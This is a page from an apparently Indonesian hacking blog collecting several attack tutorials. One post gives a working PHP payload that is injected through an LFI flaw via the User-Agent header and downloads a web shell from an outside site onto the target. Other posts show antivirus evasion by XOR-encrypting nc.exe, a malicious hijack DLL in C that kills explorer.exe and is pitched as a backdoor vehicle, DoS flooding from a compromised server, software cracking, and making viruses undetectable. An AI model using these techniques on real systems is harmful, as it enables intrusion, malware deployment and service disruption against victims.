Showing posts with label hacking/cracking. Show all posts
Showing posts with label hacking/cracking. Show all posts

Monday, February 25, 2013

Upload Shell Lewat Celah LFI

Kali ini kita akan membahas tentang cara upload shell lewat celah LFI (Local File Inclusion)....

Persiapan : 

1. target vuln LFI
2. mozilla.
3. "addon live http header" anda bisa mendownloadnya di sini
     http
s://addons.mozilla.org/en/firefox/addon/live-http-headers/

4.  mild + segelas susu hangat.... ^_^

pertama2 temukan dulu file /proc/self/environ jika udah ketemu kurang-lebih tampilannya seperti ini...


setelah ketemu... buka addons "Live HTTP Header" centang capture kemudian reload halaman tadi...
kemudian klik HTTP Header lalu klik replay... pada bagian user agent ganti dengan script php <? echo"hallllo....!" ?> untuk mengetes apakah bisa mengeksekusi perintah php... kemudian klik replay...

Lihat pada bagian HTTP_USER_AGENT terdapat string "hallllo....!" yang berarti script kita tadi ter eksekusi... sekarang kita tinggal ulangi langkah2 di atas tapi php scriptnya kita ganti seperti ini...

<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.iidaharju.com/wp-content/plugins/akismet/tet.txt", "r"); while(!feof($stream)) {  $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


script di atas untuk membuat file shell.php yang isinya saya ambil dari sini http://www.iidaharju.com/wp-content/plugins/akismet/tet.txt

kemudian klik reply... lalu buka shell.php di tempat yang sama dengan filetarget yang vuln dengan LFI tadi dan TARRA.... shell telah terupload... ^_^



Baca Lebih Lanjut >>

Sunday, August 19, 2012

Downfalls Antivirus Pakek Xor Encryption


Kali ini kita coba mengakali antivirus biar ngak ndetect lagi sama tool2 hacking kita… tool buat percobaanya saya pakek nc.exe (netcut versi console)… sebelumnya saya upload dulu nc.exe nya ke virustotal.com buat liat seberapa banyak antivirus yang mblokir tool ini… berikut hasilnya…


Ternyata dari 38 antivirus internasional 25 di antaranya atau sekitar 65.78% ternyata menganggap tool ini sebagai virus… ok langsung kita mulai saja untuk memperkecil angka ini…

tool yang dibutuhkan…          
1. target nc.exe
2. immunity debugger
3. LordPE (PE Editor… Download Di Sini                 http://www.woodmann.net/collaborative/tools/images/Bin_LordPE_2007-10-21_1.48_LordPE_1.41_Deluxe_b.zip)
4. Sebuah otak Plus kopi susu hangat… ^_^
Pertama2 kita edit dulu pe nya biar writable… buka LordPEàklik PE Editoràbrowse nc.exeàklik Sectionàklik kanan “.text”àedit section headeràganti flags dengan “E0000020” agar menjadi read write and excutable… lakukan hal yang sama untuk mengganti “.rdata” dan “data” setelah selesi klik save lalu ok
Persiapan sudah selesai… langsung cekidot…
Attach nc.exe di immunity debugger… buka notepad lalu copy 3 baris intruksi awal program di notepad…


00404AC3 >   6A 18          PUSH 18
00404AC5     68 98C04000    PUSH nc.0040C098
00404ACA   . E8 69030000    CALL nc.00404E38

Alamat yang ada tanda > berarti awal intruksi akan di jalanan… yaitu “00404AC3 >” selanjutnya cari alamat yang kosong alias codecave biasanya ada di paling bawah code program…


Ayrbyte Xor Encryption

Mov ecx,[awal enkripsi]
Xor dword ptr ds:[ecx],13
Inc ecx
Cmp ecx,[akhir enkripsi]
Jnz [alamat intruksi xor]
[dua intruksi awal program]
Jmp [alamat ketiga intruksi program]


Hasilnya seperti berikut…


Lalu kembali ke awal program klik kananàGo ToàOrigin *
ganti awal program agar mengarah ke enkripsi… menggunakan perintah jmp





Taruh break point di enkripsi kita di alamat
0040A981     6A 18          PUSH 18
Setalah itu run…  kini mulai dari alamat 00404aca sampai 0040A96C telah ter enkripsi… untuk melihatnya klik kanan alamat ecx kemudian follow in dump



Kemudian klik kananàcopy to excutableàall modificationàklik kanan-àcopy-àselect allàklik kananàsave fileàkemudian save dengan nama nc1.exe
File nc1.exe yang telah di enkripsi tadi masih bias berjalan normal… sekarang upload kembali di virus total…
berikut ini hasilnya…



Tara… sekarang sudah jauh berkurang bukan… dari 41 antivirus sekarang Cuma 16 atau sekitar 39.02% saja yang masih mendeteksinya sabagai virus… tentusaja ini masih jauh lebih baik dari yang sebelum di enkripsi tadi… ^_^
Baca Lebih Lanjut >>

Dll Hijacking


Secara sederhana Dll Hijacking adalah proses pengeksekusian perintah2 jahat ataupun code2 virus yang dilakukan dengan cara memasukkan code tersebut ke dalam file dll yang diload oleh suatu aplikasi / software, dengan kata lain ketika seseorang membuka suatu software yang didalam file librarynya telah di tanam suatu kode jahat, tanpa di sadari seorang tersebut telah ikut mengeksekusi kode jahat yang telah di tanan.
ok karna saya bukan seorang yang paham masalah-masalah teori jadi langsung prakteknya saja ya… hehehe… (maklum lom pernah duduk di bangku kuliahan ^_^)

kali ini kita akan mencoba ngganti dll nya Media Player Clasic ok…
Sofware2 yang harus di siapkan…
                1. Media Player Clasic (yang saya gunakan build number 1.5.0.2827)
                2. Immunity Debugger (pakek oly juga gak papa…!)
                3. C/C++ Compiler (Disini saya pakek wxdefc++) os nya saya pakek Windows 7
                4. Dll Export Viewer
http://www.nirsoft.net/utils/dllexp-x64.zip
                 5. Segelas susu hangat… plus camilan biar gak ngantuk….

pertama2 kit harus tau module apa saja yang di load oleh MPC ketika pertama kali di jalankan… dengan cara attach dan run mpc-hc.exe di Immunity Debugger… apabila ada exception tekan Shift+f9 terus sampai program terload secara sempurna… kemudian coba jalankan file video ataupun mp3… setelah itu tekan alt+E untuk melihat module yang terload…




Di atas file ff_libmad.dll terload saat file mp3 di putar… kita bisa menyimpan code jahat kita di file itu ^_^… setelah menentukan module yang akan digunakan kita harus mencari dahulu fungsi2 yang ada dalam modul tersebut agar module yang kita akan buat nanti dapat di tetap di load oleh mpc… untuk mengetahui fungsi apa saja yang ada di dalamnya kita dapat menggunakan tool Dll Export Viewer…


buka Dll Export Vieweràload function from the following DLL Fileàbrowse (C:\Program Files\K-Lite Codec Pack\ffdshow\ff_libmad.dll)àok


kemudian akan muncul nama2 fungsi yang ada di dalamnya…


Ok berdasarkan informasi itu langsung saja kita buat file dll palsu nya ^_^…

buka wxdevc++, kemudian klik file->new->project->dll dan beri nama projectnya “ff_libmad” lalu pilih c project dan tekan ok kemudian otomatis compiler akan mebuat dua file yaitu dllmain.c dan dll.h

ubah dllmain.c menjadi seperti ini…

/////////////////////////////////////////////////////////////////////////////////////////
/* Replace "dll.h" with the name of your header */
#include "dll.h"
#include 
#include 
#include 

void CodeJahat()
{
    char killexplorer[] = "taskkill /im explorer.exe /f";
    WinExec(killexplorer, 0);
}


//Buat Fungsi2 yang sama dengan dll aslinya…
DLLIMPORT void getVersion(){}
DLLIMPORT void mad_frame_decode(){}
DLLIMPORT void mad_frame_finish(){}
DLLIMPORT void mad_frame_init(){}
DLLIMPORT void mad_stream_buffer(){}
DLLIMPORT void mad_stream_finish(){}
DLLIMPORT void mad_stream_init(){}
DLLIMPORT void mad_synth_frame(){}
DLLIMPORT void mad_synth_init(){}


BOOL APIENTRY DllMain (HINSTANCE hInst     /* Library instance handle. */ ,
                       DWORD reason        /* Reason this function is being called. */ ,
                       LPVOID reserved     /* Not used. */ )
{
    switch (reason)
    {
      case DLL_PROCESS_ATTACH:
//CodeJahat Dieksekusi ^_^
            CodeJahat();
        break;
      case DLL_PROCESS_DETACH:
        break;
 case DLL_THREAD_ATTACH:
        break;
      case DLL_THREAD_DETACH:
        break;
    }
    /* Returns TRUE on success, FALSE on failure */
    return TRUE;
}
/////////////////////////////////////////////////////////////////////////////////////////



Fungsi CodeJahat() di atas saya buat untuk mengkill explorer.exe anda bisa ganti CodeJahatnya sesuai keinginan masing-masing ^_^

sekarang proses penentuan apakah berhasil atau tidak… compile ff_libmad kemudian taruh ff_libmad.dll buatan kita di folder
C:\Program Files\K-Lite Codec Pack\ffdshow\ sebelumnya anda rename dahulu ff_libmad.dll yang asli jadi ff_libmad(backup).dll buat cadangan yang asli ^_^

setalah itu silahkan coba buka mp3 pakek Media Player Clasic… sebelum itu q saranin mbuka command prompt dulu buat ngembaliin explorer yang di kill paksa… setelah mp3 terbuka walla… explorer pun di tutup paksa… itu tandanya kita berhasil ^_^… Untuk mengembalikan explorer cukup ketik explorer pada command prompt




Bayangkan kalau kode yang kita sisipkan adalah kode virus atau backdoor buat system korban…? Tentunya akan sangat berbahaya bukan…? Anda bisa download file dll beserta source nya yang kita buat tadi di sini http://w1ng13cr3w.webuda.com/download/dll.rar
Baca Lebih Lanjut >>

Saturday, March 31, 2012

SEH Dan safeSEH

->SEH 

   Structure Exception Handling atau lebih dikenal dengan sebutan SEH adalah sebuah bentuk penanganan yang dimiliki oleh sebuah software atau hardware dalam menagani sebuah exception, exception sendiri adalah event yang muncul saat pengeksekusian suatu aplikasi apabila suatu aplikasi tersebut mencoba untuk melakukan pengeksekusian kode yang berada di luar alur kode yang normal, sebagai contoh pada kasus buffer overflow.
   Ada dua macam bentuk exception yaitu hardware dan software, pada hardware dimunculkan oleh cpu exception ini biasanya muncul dikarenakan eksekusi intruksi yang menghasilkan sesuatu yang cacad atau eror, seperti devide by zero atau mencoba untuk mengakses sebuah alamat di memory yang invalid. Sedangkan pada software exception muncul biasanya dikarenakan saniti iput (input validation) pada aplikasi atau sistem operasi, seperti invalid parameter value sebuah input.
Baca Lebih Lanjut >>

Thursday, March 29, 2012

Ngeflood ip menggunakan Script php dengan reload every

Pertama2 tentu siapkan dulu alat2 nya... ^_^

1. Sebuah server hasil rampasan... atau terserah lah pokoknya yang kiranya punya speed tinggi ^_^
2. Reload every... bisa di download di sini https://addons.mozilla.org/id/firefox/addon/reloadevery/
3. Yag terahir ya tetu saja script php nya...
Berikut script dari Ayrbyte DoS PHP Tool

 
Baca Lebih Lanjut >>

Wednesday, February 29, 2012

Tutorial Nge Patch Software

Hallo teman2 kali ini saya mau share ni tentang bagaimana caranya membuat patch software yaitu dengan menggunakan bantuan software ollydbg,
tutorial ini bukanlah tutorial yang expert jadi untuk para master2 disaranin mending gak usah membuang2 waktu anda yang berharga untuk melihat tutorial ini...
ok langsung saja pada pembahasan...
pertama2 buka dulu target program di ollydbg dan langsung run program tersebut...
lalu lakukan registrasi pada program tersebut.....
Baca Lebih Lanjut >>

Tuesday, February 28, 2012

Membuat Virus Menjadi Undetectable Menggunakan Dsplit.exe

Ok langsung saja pada pembahasan

Sebenarnya sudah banyak software crypter yang dapat menyembunikan virus dari av, namun pada kenyataanya software2 tersebut tidak akan dapat membuat virus kita menjadi
Undetectable, hal ini dikarenakan semua software crypter tidak akan berguna lagi apabila sudah dipublikasikan secara umum karena beberapa hari setelah software itu muncul maka vendor2 av akan segera menanganinya, untuk itulah sebaiknya kita pakai cara manual untuk menjadikannya Undetectable, Yang akan kita lakukan adalah menemukan av signature dari virus kita dengan cara memecah virus kita sampai menjadi bagian terkecil kemudian setelah ketemu kita rubah menggunakan hex editor

Baca Lebih Lanjut >>